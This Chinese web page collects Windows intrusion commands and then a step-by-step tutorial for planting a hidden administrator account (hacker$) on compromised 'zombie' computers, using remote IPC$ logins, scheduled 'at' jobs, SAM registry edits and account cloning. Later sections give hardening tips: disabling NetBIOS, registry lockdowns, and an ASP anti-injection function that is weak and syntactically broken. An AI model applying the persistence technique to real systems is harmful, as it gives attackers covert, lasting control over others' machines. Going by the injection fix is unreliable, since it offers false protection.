天天看點

入侵中最常用的網絡指令

 <script language="javascript" src="http://js4.all4ad.net/mtunion/display.aspx?unionid=50624&htmlid=html/joyo/760x60_2.htm&val1=50624"></script><script language="javascript" src="http://js4.all4ad.net/mtunion/display.aspx?unionid=50624&htmlid=html/joyo/468x60_2.htm&val1=50624"></script><script language="javascript" src="http://js4.all4ad.net/mtunion/display.aspx?unionid=50624&htmlid=html/joyo/770x80_2.htm&val1=50624"></script> marginwidth="0" marginheight="0" src="http://www.joyo.com/union/eb.asp?k=6&source=ad4all_50624" frame width="120" scrolling="no" height="60"> marginwidth="0" marginheight="0" src="http://www.joyo.com/union/eb.asp?k=19&source=ad4all_50624" frame width="580" scrolling="no" height="60"> marginwidth="0" marginheight="0" src="http://www.joyo.com/union/eb.asp?k=3&source=ad4all_50624" frame width="750" scrolling="no" height="60"> marginwidth="0" marginheight="0" src="http://www.joyo.com/union/eb.asp?k=18&source=ad4all_50624" frame width="775" scrolling="no" height="80"><script language="javascript" src="http://js4.all4ad.net/mtunion/display.aspx?unionid=50624&htmlid=html/joyo/770x80_3.htm&val1=50624"></script><script language="javascript" src="http://js4.all4ad.net/mtunion/display.aspx?unionid=50624&htmlid=html/joyo/760x60_3.htm&val1=50624"></script> *net user 檢視使用者清單 *net user 使用者名 密碼 /add 添加使用者 *net user 使用者名 密碼 更改使用者密碼 *net localgroup administrators 使用者名 /add 添加使用者到管理組 *net user 使用者名 /delete 删除使用者 *net user 使用者名 檢視使用者的基本情況 *net user 使用者名 /active:no 禁用該使用者 *net user 使用者名 /active:yes 啟用該使用者 *net share 檢視計算機IPC$共享資源 *net share 共享名 檢視該共享的情況 *net share 共享名=路徑 設定共享。例如 net share c$=c: *net share 共享名 /delete 删除IPC$共享 *net use 檢視IPC$連接配接情況 *net use //ip/ipc$ "密碼" /user:"使用者名" ipc$連接配接 *net time //ip 檢視遠端計算機上的時間 *copy 路徑:/檔案名 //ip/共享名 複制檔案到已經ipc$連接配接的計算機上 *net view ip 檢視計算機上的共享資源 *ftp 伺服器位址 進入FTP伺服器 *at 檢視自己計算機上的計劃作業 *at //ip 檢視遠端計算機上的計劃作業 *at //ip 時間 指令(注意加盤符) 在遠端計算機上加一個作業 *at //ip 計劃作業ID /delete 删除遠端計算機上的一個計劃作業 *at //ip all /delete 删除遠端計算機上的全部計劃作業 ipconfig 檢視網絡連接配接 net start 開啟服務 net stop 關閉服務 建立隐藏的超級使用者前幾天在某個網站(記不清了,不好意思 ^_*)上看到了一篇介紹如何建立隐藏的超級使用者的圖文教程,給我了很大的啟發,作者隻說明了如何在本地圖形界面下建立隐藏的超級使用者,且作者說他無法在指令行下實作隐藏的超級使用者的建立,于是我就開始自已摸索,剛開始時,我用reg.exe(3.0版)作為指令行下導出導入系統資料庫檔案的工具,但每次導入以後,建立的隐藏的超級使用者總不能用,後來打開系統資料庫檢視,發現這個隐藏的超級使用者的預設資料類型并沒有被導入系統資料庫。由于這種資料類型是十六進制數表示的(如administrator的預設資料類型為000001F4,下面例子中的hacker$的資料類型是00000409)而不是我們常說的字元串型、dword型、二進制型等資料類型,reg.exe不能識别,因而也就無法導入,而在圖形界面下用系統資料庫編輯器regedit.exe卻能夠将這種資料類型導入,後來一想regedit.exe是一個兩栖程式,它既可以在windows界面下運作,也可以在DOS下運作,既然圖形界面regedit.exe能夠導入這種資料類型,那麼DOS下面的它也應該能夠導入這種資料類型,後來經試驗證明了我的想法。下面我把我實作這個隐藏的超級使用者建立方法介紹如下: 一、如何在圖形界面建立隐藏的超級使用者 圖形界面下适用本地或開3389終端服務的殭屍電腦上。上面我提到的那位作者說的方法很好,但是較為複雜,還要用到psu.exe(讓程式以系統使用者身份運作的程式),如果在殭屍電腦上的話還要上傳psu.exe。我說的這個方法将不用到psu.exe這個程式。因為windows2000有兩個系統資料庫編輯器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe實為一個程式,修改鍵值的權限時在右鍵中點“權限”來修改。對regedit.exe我想大家都很熟悉,但卻不能對系統資料庫的項鍵設定權限,而regedt32.exe最大的優點就是能夠對系統資料庫的項鍵設定權限。nt/2000/xp的帳戶資訊都在系統資料庫的HKEY_LOCAL_MACHINE/SAM/SAM鍵下,但是除了系統使用者SYSTEM外,其它使用者都無權檢視到裡面的資訊,是以我首先用regedt32.exe對SAM鍵為我設定為“完全控制”權限。這樣就可以對SAM鍵内的資訊進行讀寫了了。具體步聚如下: 1、假設我們是以超級使用者administrator登入到開有終端服務的殭屍電腦上的,首先在指令行下或帳戶管理器中建立一個帳戶:hacker$,這裡我在指令行下建立這個帳戶 net user hacker$ 1234 /add 2、在開始/運作中輸入:regedt32.exe并回車來運作regedt32.exe。 3、點“權限”以後會彈出視窗 點添加将我登入時的帳戶添加到安全欄内,這裡我是以administrator的身份登入的,是以我就将administrator加入,并設定權限為“完全控制"。這裡需要說明一下:最好是添加你登入的帳戶或帳戶所在的組,切莫修改原有的帳戶或組,否則将會帶來一系列不必要的問題。等隐藏超級使用者建好以,再來這裡将你添加的帳戶删除即可。 4、再點“開始”→“運作”并輸入"regedit.exe" 回車,啟動系統資料庫編輯器regedit.exe。 打開鍵:HKEY_LOCAL_MAICHINE/SAM/SAM/Domains/account/user/names/hacker$" 5、将項hacker$、00000409、000001F4導出為hacker.reg、409.reg、1f4.reg,用記事本分别打這幾個導出的檔案進行編輯,将超級使用者對應的項000001F4下的鍵"F"的值複制,并覆寫hacker$對應的項00000409下的鍵"F"的值,然後再将00000409.reg與hacker.reg合并。 6、在指令行下執行net user hacker$ /del将使用者hacker$删除:net user hacker$ /del 7、在regedit.exe的視窗内按F5重新整理,然後打檔案-導入系統資料庫檔案将修改好的hacker.reg導入系統資料庫即可 8、到此,隐藏的超級使用者hacker$已經建好了,然後關閉regedit.exe。在regedt32.exe視窗内把HKEY_LOCAL_MACHINE/SAM/SAM鍵權限改回原來的樣子(隻要删除添加的帳戶administrator即可)。 9、注意:隐藏的超級使用者建好後,在帳戶管理器看不到hacker$這個使用者,在指令行用“net user”指令也看不到,但是超級使用者建立以後,就不能再改密碼了,如果用net user指令來改hacker$的密碼的話,那麼在帳戶管理器中将又會看這個隐藏的超級使用者了,而且不能删除。 如何在指令行下遠端建立隐藏的超級使用者 在這裡将用at的指令,因為用at産生的計劃任務是以系統身份運作的,是以也用不到psu.exe程式。為了能夠使用at指令,殭屍電腦必須開有schedule的服務,如果沒有開啟,可用流光裡帶的工具netsvc.exe或sc.exe來遠端啟動,當然其方法也可以,隻要能啟動schedule服務就行。 對于指令行方式,你可以采用各種連接配接方式,如用SQLexec連接配接MSSQL的1433端口,也可以用telnet服務,隻要以你能得到一個cmdshell,并且有運作at指令的權限就可以。 1、首先找到一台殭屍電腦,至于如何來找那不是我這裡所說的話題。這裡先假設找到一台超級使用者為administrator,密碼為12345678的殭屍電腦,現在我們開始在指令行下遠端為它建立隐藏的超級使用者。(例子中的主機是我的區域網路内的一台主機,我将它的ip位址改為13.50.97.238,,請勿在網際網路上對号入座,以免騷擾正常的ip位址。) 2、先與殭屍電腦建立連接配接,指令為: net use //13.50.97.238/ipc$ "12345678" /user:"administrator 3、用at指令在殭屍電腦上建立一個使用者(如果at服務沒有啟動,可用小榕的netsvc.exe或sc.exe來遠端啟動):at //13.50.97.238 12:51 c:/winnt/system32/net.exe user hacker$ 1234 /add 建立這個加有$符的使用者名,是因為加有$符後,指令行下用net user将不顯示這個使用者,但在帳戶管理器卻能看到這個使用者。 4、同樣用at指令導出HKEY_LOCAL_MACHINE/sam/sam/Domains/account/users下鍵值:at //13.50.97.238 12:55 c:/winnt/regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/account/users/ /e 是regedit.exe的參數,在_LOCAL_MACHINE/SAM/SAM/Domains/account/users/這個鍵的一定要以/結尾。必要的情況下可以用引号将"c:/winnt/regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/account/users/"引起來。 5、将殭屍電腦上的hacker.reg下載下傳到本機上用記事本打開進行編輯指令為:copy //13.50.97.238/admin$/system32/hacker.reg c:/hacker.reg 修改的方法圖形界中已經介紹過了,這裡就不作介紹了。 6、再将編輯好的hacker.reg拷回殭屍電腦上 copy c:/hacker.reg //13.50.97.238/admin$/system32/hacker1.reg 7、檢視殭屍電腦時間:net time //13.50.97.238 然後用at指令将使用者hacker$删除: at //13.50.97.238 13:40 net user hacker$ /del 8、驗證hacker$是否删除:用 net use //13.50.97.238 /del 斷開與殭屍電腦的連接配接。 net use //13.50.97.238/ipc$ "1234" /user:"hacker$" 用帳戶hacker$與殭屍電腦連接配接,不能連接配接說明已删除。 9、再與殭屍電腦建立連接配接:net use //13.50.97.238/ipc$ "12345678" /user:"administrator" 再取得殭屍電腦時間,用at指令将拷回殭屍電腦的hacker1.reg導入殭屍電腦系統資料庫: at //13.50.97.238 13:41 c:/winnt/regedit.exe /s hacker1.reg regedit.exe的參數/s是指安靜模式。 10、再驗證hacker$是否已建立,方法同上面驗證hacker$是否被删除一樣。 11、再驗證使用者hacker$是否有讀、寫、删的權限,如果不放心,你還可驗證是否能建立其它帳戶。 12、通過11可以斷定使用者hacker$具有超級使用者權限,因為最初我用at指令建立它的時候是一個普通使用者,而現在卻具有遠端讀、寫、删的權限。 三、如果殭屍電腦沒有開3389終端服務,而我又不想用指令行,怎麼辦? 這種情況下,你也可以用界面方式來遠端為殭屍電腦建立隐藏的超級使用者。因為regedit.exe、regedt32.exe都有連接配接網絡系統資料庫的功能,你可以用regedt32.exe來為遠端主機的系統資料庫項設定權限,用regedit.exe來編輯遠端系統資料庫。帳戶管理器也有一項連另一台計算機的功能,你可以用帳戶管理器為遠端主機建立和删除帳戶。具體步聚與上面介紹的相似,我就不多說了,隻它的速度實在是令人難以忍受。 但是這裡有兩個前提: 1、先用net use //殭屍電腦ip/ipc$ "密碼" /user:"超級使用者名"來與遠端主機建立連接配接以後,才能用regedit.exe regedt32.exe及帳戶管理器與遠端主機連接配接。 2、遠端主機必須開啟遠端系統資料庫服務(沒有開啟的話,你也可以遠端開啟,因為你有超級使用者的密碼了)。 四、利用被禁用的帳戶建立隐藏的超級使用者: 我們可以用殭屍電腦上被禁止的使用者來建立隐藏的超組使用者.方法如下: 1.想辦法檢視有哪些使用者被細心的管理者禁止,一般情況下,有些管理者出于安全考慮,通常會将guest禁用,當然了會禁用其它使用者。在圖形界面下,非常容易,隻要在帳戶管理器中就可以看到被禁用的帳戶上有一個紅叉;而在指令行下,我還沒有想到好的辦法,隻能在指令行下用指令:"net user 使用者名"一個一個來檢視使用者是否被禁用。 2.在這裡,我們假設使用者hacker被管理者禁用。首先,我先用小榕的超組使用者克隆程式CA.exe,将被禁用的使用者hacker 克隆成超級使用者(克隆之後,被禁用的使用者hacker就會自動被激活了): CA.EXE //殭屍電腦ip Administrator 超級使用者密碼 hacher hacher密碼。 3.如果你現在一個cmdshell,如利用telnet服務或SQLEXEC連接配接殭屍電腦的msSQL的預設端口1433得到的shell都可以,這時你隻要輸入指令: net user hacker /active:no 這樣使用者hacker就被禁用了(至少表面上是這樣的),當然你也可以将使用者hacher換成其它的被禁用的使用者。 4.這時如果你在圖形界面下看帳戶管理器中的使用者時,會發現使用者hacker被禁用了,但事實上是這樣的嗎?你用這個被禁用的使用者連接配接一下殭屍電腦看看是否能連上?用指令:net user //殭屍電腦ip/ipc$ "hacker密碼" /user:"hacker" 連一連看看。我可以告訴大家,經過我多次試驗,次次都能成功,而且還是超級使用者權限。 5.如果沒有cmdshell怎麼辦?你可以我上面介紹的at指令來禁用使用者hacker;指令格式:at //殭屍電腦ip 時間 net user hacker /active:no 6.原理:具體的高深的原理我也說不上來,我隻能從最簡單的說。你先在圖形界面下在帳戶管理器中禁用一下超級使用者administrator看看,肯定會彈出一對話框,并禁止你繼續禁用超級使用者administrator,同樣,因為在克隆時,hacker在系統資料庫的"F"鍵被超級使用者administrator在系統資料庫的"F"鍵所替代,因而hacker就具有了超級使用者的權限了,但是由于hacker在系統資料庫内"C"健還是原來的"C"鍵,是以hacker還是會被禁用,但是它的超級使用者權限卻不會被禁用,是以被禁用的使用者hacker還是可以連接配接殭屍電腦,而且還具有超級使用者的權限。具體我也說不明白,大家權且這麼了解吧。 五、注意的幾點事項: 1、隐藏的超級使用者建立以後,在帳戶管理器中和指令行下均看不到這個使用者,但這個使用者卻存在。 2、隐藏的超級使用者建立以後,就不能再修改密碼了,因為一旦修改密碼,這個隐藏的超級使用者就會暴露在帳戶管理器中,而且不能删除。 3、如在本機上試驗時,最好用系統自帶的備份工具先備份好本機的“系統狀态”主要是系統資料庫的備份,因為本人做試驗時,曾出現過帳戶管理器中看不到任何使用者,組中也看不到任何組的現象,但它們卻存在。幸好我有備份,呵呵。SAM鍵是畢竟系統最敏感的部位。 4、本方法在2000/XP上測試通過,未在NT上測試。本方法僅供研究,請勿将本方法用于破壞上,利用本方法造成嚴重後果者,由使用者負責,本人概不負責。 關閉你的NetBIOS  許多人知道,NetBIOS 是計算機區域網路領域流行的一種傳輸方式,但你是否還知道,對于網際網路使用者來講,NetBIOS 則是安全領域的一大隐患。   一、NetBIOS 的煩惱   NetBIOS 是指網絡輸入輸出系統,在計算機網絡發展史中,NetBIOS 算得上是曆史悠久。早在 1985 年,IBM 公司就開始在網絡領域使用 NetBIOS,微軟推出第一套基于 Windows 的網絡作業系統--Windows For Workgroups(面向工作組的視窗作業系統)時,就采用了一種适用于 Windows 的 NetBIOS 版本,即 NetBEUI。微軟當年之是以選擇 NetBEUI 作為網絡傳輸的基本協定,是因為它占用系統資源少、傳輸效率高,尤為适用于由 20 到 200 台計算機組成的小型區域網路。此外,NetBEUI 還有一個最大的優點:可以友善地實作網絡中各單機資源的共享。   後來,網絡的發展速度之快,已大大超出人們的想象,進入 20 世紀未,全球的計算機就已可通過國際網際網路絡友善連接配接,随着網際網路絡的迅猛發展,TCP/IP 協定成為廣泛使用的傳輸協定。   今天,TCP/IP 協定已是網際網路領域的通用協定,幾乎所有接入網際網路的電腦都使用 TCP/IP。但同時,NetBEUI 協定也還在區域網路領域廣泛使用,是以,在你安裝 TCP/IP 協定時,NetBIOS 也被 Windows 作為預設設定載入了你的電腦,而電腦随即也具有了 NetBIOS 本身的開放性。換句話講,在不知不覺間,你的上網電腦已被打開了一個危險的“後門”。   NetBIOS 的開放,意味着你的硬碟可能會在網絡中成為共享。對于網上四處遊走的 來講,他們可以通過 NetBIOS 獲知你電腦中的一切!   二、找尋電腦中開放的“後門”   在想辦法關閉電腦的這個“後門”前,我們有必要先認識這個問題:網絡中的其它使用者是怎樣找到你系統漏洞的?   你可能認為:在茫茫網海,作為個人上網使用者,我的一台電腦是多麼的渺小,HACKE R 們怎會對我感興趣呢?其實,這種想法是很危險的,網上一些不懷好意的使用者(很多還稱不上是 ),說不定哪天就會盯上你。   現在,有許多被稱作“掃描機(scanners)”的黑客小程式,這些掃描程式不停地穿梭于網絡之中,專門尋找上網使用者的系統漏洞,其中就包括 NetBIOS 及 Windows “ 檔案及列印共享”功能所打開的系統後門。一旦掃描程式在網上發現了系統存在着漏洞的計算機,那些惡意攻擊者就會設法通過找到的“後門”進入你的計算機,并擷取你的資訊。而令人深感不安的是,所有的這些非法入侵行為,你可能竟然毫無知覺。   三、關閉你的“後門”   正如前文所述,系統存在後門的原因是與 TCP/IP 協定捆綁在一起的 NetBIOS,事實上,對于網際網路上的單機使用者來講,NetBIOS 是沒有什麼用處的,是以,你完全可以将它從 TCP/IP 中去掉。下面,就現在常見的幾種作業系統介紹從TCP/IP 中解除 NetBIOS 的方法。   如果你使用的是最早版本的 Windows 95,那關閉 NetBIOS 就是一件非常容易的事:找到系統裡名為 Vnbt.386 的檔案,随便将它改個名,如改為 Vnbt.out,這就算大功告成了。   如果你使用的是 Windows 95改進版、Windows 98、Windows 98 SE 或是 Windows Me,那就要稍微麻煩一點。首先,打開控制台,進入“網絡”對話窗,在配置表中,檢視清單中是否已有 NetBEUI 元件,如果有,則直接跳過下一段。   如果在清單中沒有 NetBEUI 元件,則先點選“添加”按鈕,在“要安裝的網絡元件類型”清單中,選擇“協定”一項,再次點選“添加”,在“網絡協定”對話窗中,選擇 Microsoft 的 NetBEUI,然後,插入 Windows 安裝盤,點選“确定”即可。   回到“網絡”對話窗,在網絡元件中選擇“撥号擴充卡”,點選“屬性”,在“屬性”對話窗中選擇“綁定”按鈕,将除TCP/IP之外其它協定的複選框裡的小勾清除掉。   最後,再次回到“網絡”對話窗,選擇 TCP/IP 協定,點選“屬性”,這時有可能會彈出一個警告視窗,不用理它,直接點“OK”就行了,進入 TCP/IP 的“屬性”視窗後,選擇“綁定”,将所有網絡協定複選框内的小勾去掉,點選“确定”,這時,Windo ws 會提示你至少應選擇一種協定,仍然不用理它,點選“No”,關閉視窗。重新啟動你的計算機,這樣,你計算機中的 NetBIOS 後門就已被關閉了。   這樣一來,NetBIOS 已從你計算機的 TCP/IP 協定中去除,當然,你最好檢查一下操作是否成功:回到“網絡”對話窗,選擇 TCP/IP 協定,點選“屬性”,在“屬性”視窗中點選 NetBIOS 欄,這時,你會看到“我希望在 TCP/IP 協定中開啟 NetBIOS(I want to enable NetBIOS over TCP/IP)”一項,該項前面的複選框應該沒有打勾。   現在,你就可以放心地在網絡中漫遊,而不必再擔心有人會通過 NetBIOS 入侵你的電腦。 網吧、伺服器安全管了解決方案禁止使用者使用“任務管理器” 使用者可以使用“任務管理器”對話框來啟動和結束本地程序,檢視和管理其他計算機上的程序,改變程序的優先級。通過修改系統資料庫,可以禁止使用者使用“任務管理器”。建立一個雙位元組(REG_DWORD)值項HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Policies\System\DisableTaskMgr,修改其值為1。 禁止使用系統資料庫編輯器 修改系統資料庫是複雜和危險的,是以不希望使用者去修改系統資料庫。通過修改系統資料庫,可以禁止使用者運作系統提供的兩個系統資料庫編輯器。建立一個雙位元組(REG_DWORD)值項HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Policies\System\DisableRegistryTools,修改其值為1。這樣,使用者就不能啟動系統資料庫編輯器了。注意:使用此功能要小心,最好作個系統資料庫備份,或者準備一個其他的系統資料庫修改工具。因為當你禁止使用系統資料庫編輯器後,就不能再使用該系統資料庫編輯器将值項改回了。 禁止檢視指定磁盤驅動器的内容 如果某個磁盤驅動器中存放了重要的資料,不希望使用者檢視該驅動器的内容,可以使用此方法來禁止察看該驅動器的内容。建立一個雙位元組(REG_DWORD)值項HKEY_CURRENT_USER\Software\Microsoft\ Windows\Current Version\Policies\Explorer\NoViewOnDrive。該值項從最低位(第0位)到第25位,共26個字位,分别代表驅動器A到驅動器Z。例如我們想禁止使用者使用軟碟驅動器A和B,以及驅動器D,可以修改“NoViewOnDrive”的值為“0000000b”(第0、1、3位的值為1)。修改後需要重新開機桌面使更改生效。這時再進入到“我的電腦”,輕按兩下驅動器D,系統會彈出一個消息框,告訴使用者不能進行此*作。但是應用程式仍然可以通路被禁止的驅動器。被禁止的驅動器圖示并沒有被删除,仍然出現在“我的電腦”和“資料總管”中。 禁止運作指令解釋器和批處理檔案 通過修改系統資料庫,可以禁止使用者使用指令解釋器(CMD.exe)和運作批處理檔案(.bat檔案)。建立一個雙位元組(REG_DWORD)執行HKEY_CURRENT_USER\Software\Policies\ Microsoft\Windows\System\DisableCMD,修改其值為2,指令解釋器和批處理檔案都不能被運作。修改其值為1,則隻是禁止指令解釋器的運作。 禁止注入 替換Request函數為以下内容,可以完全避免ASP被注入. Function SafeRequest(ParaName,ParaType) '--- 傳入參數 --- 'ParaName:參數名稱-字元型 'ParaType:參數類型-數字型(1表示以上參數是數字,0表示以上參數為字元) Dim ParaValue ParaValue=Request(ParaName) If ParaType=1 then If not isNumeric(ParaValue) then Response.write "參數" & ParaName & "必須為數字型!" Response.end End if Else ParaValue=replace(ParaValue,"'","''" End if SafeRequest=ParaValue End function 删除不必要的元件, ftp tftp等 在系統目錄下

繼續閱讀